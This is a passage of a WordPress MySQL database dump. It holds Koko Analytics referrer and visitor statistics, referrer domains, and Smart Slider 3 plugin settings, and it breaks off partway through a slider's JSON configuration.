('2025-04-29',3,4,6),
('2025-04-30',3,1,2),
('2025-04-30',7,1,3),
('2025-05-01',3,1,1),
('2025-05-02',3,3,3),
('2025-05-03',3,1,1),
('2025-05-05',3,3,4),
('2025-05-06',3,4,5),
('2025-05-07',2,1,1),
('2025-05-07',3,2,2),
('2025-05-08',3,2,2),
('2025-05-09',3,2,3),
('2025-05-09',9,1,2),
('2025-05-09',11,3,3),
('2025-05-10',1,1,1),
('2025-05-10',3,4,4),
('2025-05-10',11,1,1),
('2025-05-11',3,1,1),
('2025-05-12',3,1,1),
('2025-05-13',3,1,1),
('2025-05-13',9,1,2),
('2025-08-26',1,1,1),
('2025-08-26',3,2,4),
('2025-08-26',5,2,2),
('2025-08-27',1,1,1),
('2025-08-27',3,2,2),
('2025-08-29',3,1,2),
('2025-08-30',3,1,2),
('2025-08-31',3,4,7),
('2025-09-01',3,3,13),
('2025-09-02',3,7,15),
('2025-09-02',9,1,1),
('2025-09-03',3,7,12),
('2025-09-06',3,1,5),
('2025-09-07',3,5,7),
('2025-09-07',7,1,1),
('2025-09-07',9,1,2),
('2025-09-08',3,9,12),
('2025-09-08',7,1,3),
('2025-09-09',3,9,11),
('2025-09-10',3,6,9),
('2025-09-11',3,12,26),
('2025-09-12',3,1,1),
('2025-09-12',5,1,1),
('2025-09-13',3,1,2),
('2025-09-14',3,3,3),
('2025-09-14',12,1,1),
('2025-09-15',3,4,6),
('2025-09-16',3,3,3),
('2025-09-17',3,3,5),
('2025-09-18',3,2,2),
('2025-09-19',3,4,7),
('2025-09-20',3,1,2),
('2025-09-22',3,6,7),
('2025-09-22',7,1,1),
('2025-09-22',9,1,2),
('2025-09-23',3,5,8),
('2025-09-24',3,2,3),
('2025-09-25',3,8,12),
('2025-09-26',3,1,1),
('2025-09-29',3,5,5),
('2025-09-30',3,4,4),
('2025-10-01',3,2,2),
('2025-10-02',3,1,1),
('2025-10-03',3,2,2),
('2025-10-05',3,2,3),
('2025-10-06',3,6,10),
('2025-10-07',3,3,3),
('2025-10-07',7,1,1),
('2025-10-08',3,4,6),
('2025-10-09',3,4,6),
('2025-10-10',3,1,1),
('2025-10-11',3,3,5),
('2025-10-15',3,2,2),
('2025-10-16',3,2,3),
('2025-10-18',3,1,1),
('2025-10-19',3,3,5),
('2025-10-20',3,5,5),
('2025-10-21',3,4,6),
('2025-10-22',3,3,3),
('2025-10-25',3,3,3),
('2025-10-26',1,1,1),
('2025-10-26',3,2,9),
('2025-10-26',9,2,2),
('2025-10-27',3,3,3),
('2025-10-28',3,3,3),
('2025-10-30',3,2,3),
('2025-10-31',3,3,4),
('2025-10-31',5,1,1),
('2025-11-01',3,4,5),
('2025-11-03',3,2,2),
('2025-11-04',3,3,3),
('2025-11-05',3,8,10),
('2025-11-05',5,1,1),
('2025-11-05',7,1,1),
('2025-11-05',13,2,2),
('2025-11-06',3,3,3),
('2025-11-07',3,3,4),
('2025-11-07',9,8,9),
('2025-11-08',9,1,2),
('2025-11-10',3,4,8),
('2025-11-10',5,0,5),
('2025-11-11',1,1,1),
('2025-11-11',3,4,5),
('2025-11-12',1,2,3),
('2025-11-12',3,3,5),
('2025-11-12',5,1,1),
('2025-11-13',1,2,12),
('2025-11-13',3,1,1),
('2025-11-13',5,1,1),
('2025-11-14',3,7,11),
('2025-11-15',3,1,2),
('2025-11-16',3,1,1);
/*!40000 ALTER TABLE `wp_koko_analytics_referrer_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_koko_analytics_referrer_urls`
--

DROP TABLE IF EXISTS `wp_koko_analytics_referrer_urls`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_koko_analytics_referrer_urls` (
  `id` mediumint(8) unsigned NOT NULL AUTO_INCREMENT,
  `url` varchar(255) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `url` (`url`)
) ENGINE=InnoDB AUTO_INCREMENT=14 DEFAULT CHARSET=ascii COLLATE=ascii_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_koko_analytics_referrer_urls`
--

LOCK TABLES `wp_koko_analytics_referrer_urls` WRITE;
/*!40000 ALTER TABLE `wp_koko_analytics_referrer_urls` DISABLE KEYS */;
INSERT INTO `wp_koko_analytics_referrer_urls` VALUES
(7,'bing.com'),
(1,'data.ssk.in.th'),
(9,'facebook.com'),
(12,'gevciamst.online'),
(8,'google.co.id'),
(4,'google.co.th'),
(3,'google.com'),
(11,'instagram.com'),
(13,'nwk.ssk.in.th'),
(6,'search.yahoo.com'),
(2,'th.search.yahoo.com'),
(5,'webhost.ssk.in.th'),
(10,'yfnvdh.slashpet.com');
/*!40000 ALTER TABLE `wp_koko_analytics_referrer_urls` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_koko_analytics_site_stats`
--

DROP TABLE IF EXISTS `wp_koko_analytics_site_stats`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_koko_analytics_site_stats` (
  `date` date NOT NULL,
  `visitors` mediumint(8) unsigned NOT NULL,
  `pageviews` mediumint(8) unsigned NOT NULL,
  PRIMARY KEY (`date`)
) ENGINE=InnoDB DEFAULT CHARSET=ascii COLLATE=ascii_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_koko_analytics_site_stats`
--

LOCK TABLES `wp_koko_analytics_site_stats` WRITE;
/*!40000 ALTER TABLE `wp_koko_analytics_site_stats` DISABLE KEYS */;
INSERT INTO `wp_koko_analytics_site_stats` VALUES
('2024-07-29',2,4),
('2024-07-30',6,14),
('2024-07-31',3,5),
('2024-08-01',8,14),
('2024-08-02',6,9),
('2024-08-03',5,24),
('2024-08-04',3,4),
('2024-08-05',4,17),
('2024-08-06',21,80),
('2024-08-07',7,16),
('2024-08-09',4,8),
('2024-08-10',1,1),
('2024-08-11',8,9),
('2024-08-12',4,7),
('2024-08-13',4,6),
('2024-08-14',8,18),
('2024-08-15',8,44),
('2024-08-16',5,15),
('2024-08-17',1,1),
('2024-08-19',3,3),
('2024-08-20',5,10),
('2024-08-21',0,3),
('2024-08-22',3,4),
('2024-08-23',4,29),
('2024-08-24',2,2),
('2024-08-25',4,7),
('2024-08-26',7,33),
('2024-08-27',15,77),
('2024-08-28',22,157),
('2024-08-29',24,121),
('2024-08-30',12,132),
('2024-08-31',5,5),
('2024-09-01',2,6),
('2024-09-02',7,11),
('2024-09-03',11,41),
('2024-09-04',6,11),
('2024-09-05',7,10),
('2024-09-06',8,16),
('2024-09-07',3,3),
('2024-09-08',1,1),
('2024-09-09',9,17),
('2024-09-10',4,4),
('2024-09-11',7,13),
('2024-09-12',7,33),
('2024-09-14',2,3),
('2024-09-15',2,2),
('2024-09-16',3,7),
('2024-09-17',4,8),
('2024-09-18',2,4),
('2024-09-19',7,12),
('2024-09-20',4,9),
('2024-09-23',4,6),
('2024-09-24',8,73),
('2024-09-25',10,37),
('2024-09-26',8,12),
('2024-09-27',3,4),
('2024-09-28',4,5),
('2024-09-29',1,2),
('2024-09-30',5,8),
('2024-10-01',3,13),
('2024-10-02',4,6),
('2024-10-04',2,2),
('2024-10-05',2,2),
('2024-10-10',1,1),
('2025-01-14',12,24),
('2025-01-15',4,6),
('2025-01-16',5,5),
('2025-01-17',5,11),
('2025-01-18',4,5),
('2025-01-19',2,3),
('2025-01-20',17,22),
('2025-01-21',15,32),
('2025-01-22',11,12),
('2025-01-23',9,24),
('2025-01-24',6,7),
('2025-01-25',7,14),
('2025-01-26',7,12),
('2025-01-27',11,17),
('2025-01-28',3,3),
('2025-01-29',15,28),
('2025-01-30',6,9),
('2025-01-31',7,11),
('2025-02-01',3,4),
('2025-02-02',4,5),
('2025-02-03',7,7),
('2025-02-04',9,9),
('2025-02-05',8,18),
('2025-02-06',7,11),
('2025-02-07',4,13),
('2025-02-08',5,7),
('2025-02-09',3,6),
('2025-02-10',10,12),
('2025-02-11',4,10),
('2025-02-12',2,2),
('2025-02-13',5,5),
('2025-02-14',8,13),
('2025-02-15',5,6),
('2025-02-16',3,5),
('2025-02-17',9,11),
('2025-02-18',4,7),
('2025-02-19',9,15),
('2025-02-20',8,12),
('2025-02-21',6,7),
('2025-02-22',9,23),
('2025-02-23',10,23),
('2025-02-24',6,11),
('2025-02-25',5,13),
('2025-02-27',3,3),
('2025-02-28',2,2),
('2025-03-01',6,6),
('2025-03-02',5,12),
('2025-03-03',6,7),
('2025-03-04',4,5),
('2025-03-05',5,6),
('2025-03-06',9,14),
('2025-03-07',4,4),
('2025-03-08',4,5),
('2025-03-09',2,3),
('2025-03-10',6,11),
('2025-03-11',12,16),
('2025-03-12',3,7),
('2025-03-13',8,8),
('2025-03-14',6,6),
('2025-03-15',8,11),
('2025-03-16',2,3),
('2025-03-17',10,16),
('2025-03-18',6,12),
('2025-03-19',9,16),
('2025-03-20',14,21),
('2025-03-21',10,13),
('2025-03-22',3,5),
('2025-03-23',6,23),
('2025-03-24',6,11),
('2025-03-25',10,11),
('2025-03-26',11,20),
('2025-03-27',8,18),
('2025-03-28',6,17),
('2025-03-29',6,33),
('2025-03-30',8,9),
('2025-03-31',40,65),
('2025-04-01',8,11),
('2025-04-02',4,7),
('2025-04-03',5,10),
('2025-04-04',4,9),
('2025-04-05',5,9),
('2025-04-06',3,5),
('2025-04-07',17,22),
('2025-04-08',4,8),
('2025-04-09',4,8),
('2025-04-10',6,7),
('2025-04-11',6,8),
('2025-04-12',3,6),
('2025-04-13',4,4),
('2025-04-15',2,2),
('2025-04-16',8,14),
('2025-04-17',6,11),
('2025-04-18',4,6),
('2025-04-19',3,3),
('2025-04-20',1,3),
('2025-04-21',4,13),
('2025-04-22',7,12),
('2025-04-23',3,3),
('2025-04-24',8,16),
('2025-04-26',5,8),
('2025-04-28',7,12),
('2025-04-29',6,15),
('2025-04-30',2,6),
('2025-05-01',4,5),
('2025-05-02',4,4),
('2025-05-03',3,5),
('2025-05-04',6,6),
('2025-05-05',6,10),
('2025-05-06',7,9),
('2025-05-07',9,9),
('2025-05-08',7,8),
('2025-05-09',8,11),
('2025-05-10',9,9),
('2025-05-11',1,1),
('2025-05-12',3,4),
('2025-05-13',3,4),
('2025-08-26',5,12),
('2025-08-27',4,6),
('2025-08-28',1,2),
('2025-08-29',1,2),
('2025-08-30',1,7),
('2025-08-31',6,10),
('2025-09-01',9,32),
('2025-09-02',10,20),
('2025-09-03',9,15),
('2025-09-06',3,8),
('2025-09-07',11,18),
('2025-09-08',17,32),
('2025-09-09',14,28),
('2025-09-10',12,16),
('2025-09-11',16,39),
('2025-09-12',6,9),
('2025-09-13',2,3),
('2025-09-14',11,17),
('2025-09-15',6,8),
('2025-09-16',4,5),
('2025-09-17',3,6),
('2025-09-18',7,11),
('2025-09-19',5,8),
('2025-09-20',2,3),
('2025-09-21',3,3),
('2025-09-22',11,15),
('2025-09-23',6,10),
('2025-09-24',4,6),
('2025-09-25',12,19),
('2025-09-26',1,2),
('2025-09-28',1,1),
('2025-09-29',5,5),
('2025-09-30',4,4),
('2025-10-01',2,2),
('2025-10-02',2,2),
('2025-10-03',2,4),
('2025-10-04',4,5),
('2025-10-05',3,4),
('2025-10-06',9,13),
('2025-10-07',6,6),
('2025-10-08',7,10),
('2025-10-09',5,7),
('2025-10-10',3,5),
('2025-10-11',4,8),
('2025-10-13',1,1),
('2025-10-14',3,5),
('2025-10-15',2,10),
('2025-10-16',6,10),
('2025-10-18',2,2),
('2025-10-19',4,14),
('2025-10-20',6,6),
('2025-10-21',7,10),
('2025-10-22',6,6),
('2025-10-24',3,3),
('2025-10-25',8,11),
('2025-10-26',8,28),
('2025-10-27',6,6),
('2025-10-28',5,7),
('2025-10-30',3,5),
('2025-10-31',5,6),
('2025-11-01',5,6),
('2025-11-02',3,3),
('2025-11-03',4,4),
('2025-11-04',9,12),
('2025-11-05',12,14),
('2025-11-06',5,5),
('2025-11-07',13,16),
('2025-11-08',3,4),
('2025-11-10',4,13),
('2025-11-11',8,10),
('2025-11-12',6,11),
('2025-11-13',8,28),
('2025-11-14',8,21),
('2025-11-15',3,5),
('2025-11-16',1,1),
('2025-11-17',1,5);
/*!40000 ALTER TABLE `wp_koko_analytics_site_stats` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT 1,
  `link_rating` int(11) NOT NULL DEFAULT 0,
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_image_storage`
--

DROP TABLE IF EXISTS `wp_nextend2_image_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_image_storage` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `hash` varchar(32) NOT NULL,
  `image` text NOT NULL,
  `value` mediumtext NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `hash` (`hash`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_image_storage`
--

LOCK TABLES `wp_nextend2_image_storage` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_image_storage` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_nextend2_image_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_section_storage`
--

DROP TABLE IF EXISTS `wp_nextend2_section_storage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_section_storage` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `application` varchar(20) NOT NULL,
  `section` varchar(128) NOT NULL,
  `referencekey` varchar(128) NOT NULL,
  `value` mediumtext NOT NULL,
  `isSystem` int(11) NOT NULL DEFAULT 0,
  `editable` int(11) NOT NULL DEFAULT 1,
  PRIMARY KEY (`id`),
  KEY `isSystem` (`isSystem`),
  KEY `editable` (`editable`),
  KEY `application` (`application`,`section`(50),`referencekey`(50)),
  KEY `application_2` (`application`,`section`(50))
) ENGINE=InnoDB AUTO_INCREMENT=10003 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_section_storage`
--

LOCK TABLES `wp_nextend2_section_storage` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_section_storage` DISABLE KEYS */;
INSERT INTO `wp_nextend2_section_storage` VALUES
(10000,'smartslider','settings','','{\"n2_ss3_version\":\"3.5.1.19\\/b:release-3.5.1.19\\/r:4e06d1a7c4bae6a4e54c585b3749e7c169b51386\"}',0,1),
(10001,'smartslider','license','isActive','0',0,1),
(10002,'smartslider','license','key','',0,1);
/*!40000 ALTER TABLE `wp_nextend2_section_storage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_smartslider3_generators`
--

DROP TABLE IF EXISTS `wp_nextend2_smartslider3_generators`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_smartslider3_generators` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `group` varchar(254) NOT NULL,
  `type` varchar(254) NOT NULL,
  `params` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_smartslider3_generators`
--

LOCK TABLES `wp_nextend2_smartslider3_generators` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_generators` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_generators` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_smartslider3_sliders`
--

DROP TABLE IF EXISTS `wp_nextend2_smartslider3_sliders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_smartslider3_sliders` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `alias` text DEFAULT NULL,
  `title` text NOT NULL,
  `type` varchar(30) NOT NULL,
  `params` mediumtext NOT NULL,
  `slider_status` varchar(50) NOT NULL DEFAULT 'published',
  `time` datetime NOT NULL,
  `thumbnail` text NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`id`),
  KEY `slider_status` (`slider_status`),
  KEY `time` (`time`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_smartslider3_sliders`
--

LOCK TABLES `wp_nextend2_smartslider3_sliders` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_sliders` DISABLE KEYS */;
INSERT INTO `wp_nextend2_smartslider3_sliders` VALUES
(1,NULL,'Tutorial Slider','simple','{\"aria-label\":\"Slider\",\"alias-id\":\"\",\"alias-smoothscroll\":\"\",\"alias-slideswitch\":\"\",\"background\":\"\",\"background-fixed\":\"0\",\"background-size\":\"cover\",\"background-color\":\"FFFFFF00\",\"backgroundVideoMp4\":\"\",\"backgroundVideoMuted\":\"1\",\"backgroundVideoLoop\":\"1\",\"backgroundVideoMode\":\"fill\",\"align\":\"normal\",\"margin\":\"0|*|0|*|0|*|0\",\"padding\":\"0|*|0|*|0|*|0\",\"perspective\":\"1000\",\"border-width\":\"0\",\"border-color\":\"3E3E3Eff\",\"border-radius\":\"0\",\"slider-preset\":\"\",\"slider-css\":\"\",\"width\":\"1200\",\"height\":\"600\",\"mobileportrait\":\"1\",\"mobilelandscape\":\"1\",\"tabletportrait\":\"1\",\"tabletlandscape\":\"1\",\"desktopportrait\":\"1\",\"desktoplandscape\":\"1\",\"responsiveLimitSlideWidth\":\"1\",\"responsiveSlideWidthDesktopLandscape\":\"0\",\"responsiveSlideWidthMaxDesktopLandscape\":\"1600\",\"responsiveSlideWidth\":\"0\",\"responsiveSlideWidthMax\":\"3000\",\"responsiveSlideWidthTabletLandscape\":\"0\",\"responsiveSlideWidthMaxTabletLandscape\":\"1200\",\"responsiveSlideWidthTablet\":\"0\",\"responsiveSlideWidthMaxTablet\":\"3000\",\"responsiveSlideWidthMobileLandscape\":\"0\",\"responsiveSlideWidthMaxMobileLandscape\":\"740\",\"responsiveSlideWidthMobile\":\"0\",\"responsiveSlideWidthMaxMobile\":\"480\",\"responsive-breakpoint-desktop-portrait\":\"1440\",\"responsive-breakpoint-desktop-portrait-landscape\":\"1440\",\"responsive-breakpoint-tablet-landscape\":\"1300\",\"responsive-breakpoint-tablet-landscape-landscape\":\"1300\",\"responsive-breakpoint-tablet-portrait\":\"1199\",\"responsive-breakpoint-tablet-portrait-landscape\":\"1199\",\"responsive-breakpoint-mobile-landscape\":\"900\",\"responsive-breakpoint-mobile-landscape-landscape\":\"1050\",\"responsive-breakpoint-mobile-portrait\":\"700\",\"responsive-breakpoint-mobile-portrait-landscape\":\"900\",\"responsive-breakpoint-desktop-landscape-enabled\":\"0\",\"responsive-breakpoint-tablet-landscape-enabled\":\"0\",\"responsive-breakpoint-tablet-portrait-enabled\":\"1\",\"responsive-breakpoint-mobile-landscape-enabled\":\"0\",\"responsive-breakpoint-mobile-portrait-enabled\":\"1\",\"responsive-breakpoint-global\":\"0\",\"breakpoints-orientation\":\"portrait\",\"responsive-mode\":\"fullwidth\",\"responsiveSliderHeightMin\":\"0\",\"responsiveForceFull\":\"1\",\"responsiveForceFullOverflowX\":\"body\",\"responsiveForceFullHorizontalSelector\":\"body\",\"slider-size-override\":\"0\",\"slider-size-override-mobile-portrait\":\"0\",\"mobile-portrait-width\":\"320\",\"mobile-portrait-height\":\"568\",\"slider-size-override-mobile-landscape\":\"0\",\"mobile-landscape-width\":\"568\",\"mobile-landscape-height\":\"320\",\"slider-size-override-tablet-portrait\":\"0\",\"tablet-portrait-width\":\"768\",\"tablet-portrait-height\":\"1024\",\"slider-size-override-tablet-landscape\":\"0\",\"tablet-landscape-width\":\"1024\",\"tablet-landscape-height\":\"768\",\"slider-size-override-desktop-landscape\":\"0\",\"desktop-landscape-width\":\"1440\",\"desktop-landscape-height\":\"900\",\"controlsTouch\":\"horizontal\",\"controlsScroll\":\"0\",\"controlsKeyboard\":\"1\",\"widget-arrow-enabled\":\"0\",\"widgetarrow\":\"imageEmpty\",\"widget-arrow-previous\":\"thin-horizontal.svg\",\"widget-arrow-previous-image\":\"\",\"widget-arrow-previous-color\":\"ffffffcc\",\"widget-arrow-previous-hover\":\"1\",\"widget-arrow-previous-hover-color\":\"ffffffff\",\"widget-arrow-mirror\":\"1\",\"widget-arrow-next\":\"thin-horizontal.svg\",\"widget-arrow-next-image\":\"\",\"widget-arrow-next-color\":\"ffffffcc\",\"widget-arrow-next-hover\":\"0\",\"widget-arrow-next-hover-color\":\"ffffffcc\",\"widget-arrow-style\":\"\",\"widget-arrow-previous-position-mode\":\"simple\",\"widget-arrow-previous-position-area\":\"6\",\"widget-arrow-previous-position-stack\":\"1\",\"widget-arrow-previous-position-offset\":\"15\",\"widget-arrow-previous-position-horizontal\":\"left\",\"widget-arrow-previous-position-horizontal-position\":\"0\",\"widget-arrow-previous-position-horizontal-unit\":\"px\",\"widget-arrow-previous-position-vertical\":\"top\",\"widget-arrow-previous-position-vertical-position\":\"0\",\"widget-arrow-previous-position-vertical-unit\":\"px\",\"widget-arrow-next-position-mode\":\"simple\",\"widget-arrow-next-position-area\":\"7\",\"widget-arrow-next-position-stack\":\"1\",\"widget-arrow-next-position-offset\":\"15\",\"widget-arrow-next-position-horizontal\":\"left\",\"widget-arrow-next-position-horizontal-position\":\"0\",\"widget-arrow-next-position-horizontal-unit\":\"px\",\"widget-arrow-next-position-vertical\":\"top\",\"widget-arrow-next-position-vertical-position\":\"0\",\"widget-arrow-next-position-vertical-unit\":\"px\",\"widget-arrow-animation\":\"fade\",\"widget-arrow-previous-alt\":\"previous arrow\",\"widget-arrow-next-alt\":\"next arrow\",\"widget-arrow-base64\":\"1\",\"widget-arrow-display-hover\":\"0\",\"widget-arrow-display-mobileportrait\":\"0\",\"widget-arrow-display-mobilelandscape\":\"0\",\"widget-arrow-display-tabletportrait\":\"1\",\"widget-arrow-display-tabletlandscape\":\"1\",\"widget-arrow-display-desktopportrait\":\"1\",\"widget-arrow-display-desktoplandscape\":\"1\",\"widget-arrow-exclude-slides\":\"\",\"widget-bullet-enabled\":\"1\",\"widgetbullet\":\"transition\",\"widget-bullet-position-mode\":\"simple\",\"widget-bullet-position-area\":\"10\",\"widget-bullet-position-stack\":\"1\",\"widget-bullet-position-offset\":\"5\",\"widget-bullet-position-horizontal\":\"left\",\"widget-bullet-position-horizontal-position\":\"0\",\"widget-bullet-position-horizontal-unit\":\"px\",\"widget-bullet-position-vertical\":\"top\",\"widget-bullet-position-vertical-position\":\"0\",\"widget-bullet-position-vertical-unit\":\"px\",\"widget-bullet-action\":\"click\",\"widget-bullet-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"00000000\\\",\\\"opacity\\\":100,\\\"padding\\\":\\\"5|*|5|*|5|*|5|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"2|*|solid|*|ffffffcc\\\",\\\"borderradius\\\":\\\"50\\\",\\\"extra\\\":\\\"margin: 4px;\\\"},{\\\"extra\\\":\\\"\\\",\\\"backgroundcolor\\\":\\\"ffffffcc\\\",\\\"border\\\":\\\"2|*|solid|*|ffffffcc\\\"}]}\",\"widget-bullet-bar\":\"\",\"widget-bullet-bar-full-size\":\"0\",\"widget-bullet-align\":\"center\",\"widget-bullet-orientation\":\"auto\",\"widget-bullet-thumbnail-show-image\":\"0\",\"widget-bullet-thumbnail-width\":\"60\",\"widget-bullet-thumbnail-height\":\"60\",\"widget-bullet-thumbnail-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"00000080\\\",\\\"padding\\\":\\\"3|*|3|*|3|*|3|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"3\\\",\\\"extra\\\":\\\"margin: 5px;\\\"}]}\",\"widget-bullet-thumbnail-side\":\"before\",\"widget-bullet-display-hover\":\"0\",\"widget-bullet-display-mobileportrait\":\"1\",\"widget-bullet-display-mobilelandscape\":\"1\",\"widget-bullet-display-tabletportrait\":\"1\",\"widget-bullet-display-tabletlandscape\":\"1\",\"widget-bullet-display-desktopportrait\":\"1\",\"widget-bullet-display-desktoplandscape\":\"1\",\"widget-bullet-exclude-slides\":\"\",\"widget-bar-enabled\":\"0\",\"widgetbar\":\"horizontal\",\"widget-bar-position-mode\":\"simple\",\"widget-bar-position-area\":\"10\",\"widget-bar-position-stack\":\"1\",\"widget-bar-position-offset\":\"30\",\"widget-bar-position-horizontal\":\"left\",\"widget-bar-position-horizontal-position\":\"0\",\"widget-bar-position-horizontal-unit\":\"px\",\"widget-bar-position-vertical\":\"top\",\"widget-bar-position-vertical-position\":\"0\",\"widget-bar-position-vertical-unit\":\"px\",\"widget-bar-animate\":\"0\",\"widget-bar-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"000000ab\\\",\\\"padding\\\":\\\"5|*|20|*|5|*|20|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"40\\\",\\\"extra\\\":\\\"\\\"}]}\",\"widget-bar-show-title\":\"1\",\"widget-bar-font-title\":\"{\\\"data\\\":[{\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000c7\\\",\\\"afont\\\":\\\"Montserrat\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"bold\\\":0,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"left\\\",\\\"extra\\\":\\\"vertical-align: middle;\\\"},{\\\"color\\\":\\\"fc2828ff\\\",\\\"afont\\\":\\\"google(@import url(http://fonts.googleapis.com/css?family=Raleway);),Arial\\\",\\\"size\\\":\\\"25||px\\\"},{}]}\",\"widget-bar-show-description\":\"1\",\"widget-bar-font-description\":\"{\\\"data\\\":[{\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000c7\\\",\\\"afont\\\":\\\"Montserrat\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"bold\\\":0,\\\"italic\\\":1,\\\"underline\\\":0,\\\"align\\\":\\\"left\\\",\\\"extra\\\":\\\"vertical-align: middle;\\\"},{\\\"color\\\":\\\"fc2828ff\\\",\\\"afont\\\":\\\"Raleway,Arial\\\",\\\"size\\\":\\\"25||px\\\"},{}]}\",\"widget-bar-slide-count\":\"0\",\"widget-bar-width\":\"100%\",\"widget-bar-full-width\":\"0\",\"widget-bar-separator\":\" - \",\"widget-bar-align\":\"center\",\"widget-bar-display-hover\":\"0\",\"widget-bar-display-mobileportrait\":\"1\",\"widget-bar-display-mobilelandscape\":\"1\",\"widget-bar-display-tabletportrait\":\"1\",\"widget-bar-display-tabletlandscape\":\"1\",\"widget-bar-display-desktopportrait\":\"1\",\"widget-bar-display-desktoplandscape\":\"1\",\"widget-bar-exclude-slides\":\"\",\"widget-thumbnail-enabled\":\"0\",\"widgetthumbnail\":\"default\",\"widget-thumbnail-show-image\":\"1\",\"widget-thumbnail-width\":\"100\",\"widget-thumbnail-height\":\"60\",\"widget-thumbnail-position-mode\":\"simple\",\"widget-thumbnail-position-area\":\"12\",\"widget-thumbnail-position-stack\":\"1\",\"widget-thumbnail-position-offset\":\"0\",\"widget-thumbnail-position-horizontal\":\"left\",\"widget-thumbnail-position-horizontal-position\":\"0\",\"widget-thumbnail-position-horizontal-unit\":\"px\",\"widget-thumbnail-position-vertical\":\"top\",\"widget-thumbnail-position-vertical-position\":\"0\",\"widget-thumbnail-position-vertical-unit\":\"px\",